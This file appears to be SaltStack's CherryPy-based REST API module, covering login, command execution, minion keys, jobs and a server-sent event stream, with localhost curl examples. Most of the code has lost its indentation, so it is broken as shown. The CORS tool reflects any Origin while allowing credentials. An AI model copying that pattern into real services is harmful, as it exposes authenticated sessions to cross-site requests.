rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
cherrypy.response.status = 403
return {
'status': cherrypy.response.status,
'return': "Bad IP",
}
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if not cherrypy.session.has_key('token'): # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
return out(ret)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
def process_request_body(fn):
    '''
    A decorator to skip a processor function if process_request_body is False
    '''
    @functools.wraps(fn)
    def wrapped(*args, **kwargs):  # pylint: disable=C0111
        if cherrypy.request.process_request_body is not False:
            fn(*args, **kwargs)
    return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if not isinstance(data, list):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
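# Illustrative sketch of the transformation performed by lowdata_fmt() above:
# an urlencoded body such as
#     fun=test.ping&client=local&tgt=*&arg=one&arg=two
# arrives from urlencoded_processor() as the dict
#     {'fun': 'test.ping', 'client': 'local', 'tgt': '*', 'arg': ['one', 'two']}
# and is wrapped into the single-chunk lowstate
#     [{'fun': 'test.ping', 'client': 'local', 'tgt': '*', 'arg': ['one', 'two']}]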
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_handler',
cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
        # If the lowstate loaded isn't a list, let's notify the client
        if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
# Grab all available client interfaces
clients = [name for name, _ in inspect.getmembers(salt.netapi.NetapiClient,
predicate=inspect.ismethod) if not name.startswith('__')]
clients.remove('run') # run method calls client interfaces
return {
'return': "Welcome",
'clients': clients,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-H "Accept: application/x-yaml" \\
-H "X-Auth-Token: d40d1e1e<...snip...>" \\
-d client=local \\
-d tgt='*' \\
                -d fun='test.ping'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
fun=test.ping&client=local&tgt=*
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
**Other examples**:
.. code-block:: bash
# Sending multiple positional args with urlencoded:
curl -sSik https://localhost:8000 \\
-d client=local \\
-d tgt='*' \\
-d fun='cmd.run' \\
-d arg='du -sh .' \\
-d arg='/path/to/dir'
            # Sending positional args and keyword args with JSON:
echo '[
{
"client": "local",
"tgt": "*",
"fun": "cmd.run",
"arg": [
"du -sh .",
"/path/to/dir"
],
"kwarg": {
"shell": "/bin/sh",
"template": "jinja"
}
}
]' | curl -sSik https://localhost:8000 \\
-H 'Content-type: application/json' \\
-d@-
# Calling runner functions:
curl -sSik https://localhost:8000 \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682' \\
-d outputter=highstate
# Calling wheel functions:
curl -sSik https://localhost:8000 \\
-d client=wheel \\
-d fun='key.gen_accept' \\
-d id_=dave \\
-d keysize=4096
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
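# Illustrative sketch (not part of the upstream module): driving the root URL
# from Python with the third-party ``requests`` package. The URL and token
# handling are assumptions for a local salt-api listening on localhost:8000;
# ``token`` would come from a prior POST to /login.
def _example_post_lowstate(token):
    import requests  # assumed to be installed in the client environment
    low = [{'client': 'local', 'tgt': '*', 'fun': 'test.ping'}]
    resp = requests.post('http://localhost:8000/',
                         json=low,
                         headers={'X-Auth-Token': token,
                                  'Accept': 'application/json'})
    return resp.json()['return']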
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-H "Accept: application/x-yaml" \\
-d tgt='*' \\
-d fun='status.diskusage'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.lookup_jid' if jid else 'jobs.list_jobs',
'jid': jid,
}]
if jid:
lowstate.append({
'client': 'runner',
'fun': 'jobs.list_job',
'jid': jid,
})
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
job_ret, job_info = job_ret_info
ret['info'] = [job_info]
else:
job_ret = job_ret_info[0]
ret['return'] = [job_ret]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
self._cp_config['tools.salt_token.on'] = True
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
def POST(self, mid, keysize=None, force=None, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
.. versionadded:: 2014.7.0
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
self._cp_config['tools.hypermedia_out.on'] = False
self._cp_config['tools.sessions.on'] = False
lowstate = [{
'client': 'wheel',
'fun': 'key.gen_accept',
'id_': mid,
}]
if keysize:
lowstate[0]['keysize'] = keysize
if force:
lowstate[0]['force'] = force
lowstate[0].update(kwargs)
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = StringIO.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, StringIO.StringIO(pub_key))
tarball.addfile(priv_key_file, StringIO.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(mid)
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
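# Illustrative sketch (not part of the upstream module): consuming the tarball
# returned by POST /keys from Python. The host, credentials and eauth backend
# are placeholders matching the curl example in the docstring above.
def _example_fetch_keys(mid):
    import io
    import requests  # assumed to be installed in the client environment
    resp = requests.post('http://localhost:8000/keys',
                         data={'mid': mid, 'username': 'kickstart',
                               'password': 'kickstart', 'eauth': 'pam'})
    # The response body is a tar archive containing minion.pub and minion.pem.
    return tarfile.open(fileobj=io.BytesIO(resp.content))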
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-H "Accept: application/json" \\
-d username='saltuser' \\
-d password='saltpass' \\
-d eauth='pam'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept: application/json
username=saltuser&password=saltpass&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
perms = eauth.get(token['name'], eauth.get('*'))
if perms is None:
raise ValueError("Eauth permission list not found.")
except (AttributeError, IndexError, KeyError, ValueError):
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
raise cherrypy.HTTPError(500,
'Configuration for external_auth could not be read.')
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms,
}]}
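# Illustrative sketch (not part of the upstream module): obtaining a session
# token from /login with ``requests``. The username, password and eauth values
# are placeholders for whatever the master's external_auth config accepts.
def _example_login():
    import requests  # assumed to be installed in the client environment
    resp = requests.post('http://localhost:8000/login',
                         json={'username': 'saltuser',
                               'password': 'saltpass',
                               'eauth': 'pam'},
                         headers={'Accept': 'application/json'})
    return resp.json()['return'][0]['token']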
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Class to run commands without normal session handling
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
.. http:post:: /run
This entry point is primarily for "one-off" commands. Each request
must pass full Salt authentication credentials. Otherwise this URL
is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.
:term:`lowstate` data describing Salt commands must be sent in the
request body.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='local' \\
-d tgt='*' \\
-d fun='test.ping' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='pam'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=local&tgt=*&fun=test.ping&username=saltdev&password=saltdev&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
        clients to only watch for certain tags without having to deserialize the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
            // Note, you must be authenticated!
var source = new EventSource('/events');
source.onopen = function() { console.debug('opening') };
source.onerror = function(e) { console.debug('error!', e) };
source.onmessage = function(e) {
console.debug('Tag: ', e.data.tag)
console.debug('Data: ', e.data.data)
};
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events', {withCredentials: true});
Some browser clients lack CORS support for the ``EventSource()`` API. Such
        clients may instead pass the :mailheader:`X-Auth-Token` value as a URL
parameter:
.. code-block:: bash
curl -NsS localhost:8000/events/6d1b722e
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
        # Pulling the session token from a URL param is a workaround for
        # browsers not supporting CORS in the EventSource API.
        if token:
            orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
            salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
yield u'retry: {0}\n'.format(400)
while True:
data = stream.next()
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
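# Illustrative sketch (not part of the upstream module): a minimal client-side
# reader for the /events stream using ``requests``. It strips the ``tag:`` and
# ``data:`` prefixes described in the docstring above and yields decoded events.
def _example_consume_events(token):
    import requests  # assumed to be installed in the client environment
    resp = requests.get('http://localhost:8000/events',
                        headers={'X-Auth-Token': token}, stream=True)
    for line in resp.iter_lines():
        if line.startswith(b'data: '):
            yield json.loads(line[len(b'data: '):].decode('utf-8'))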
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
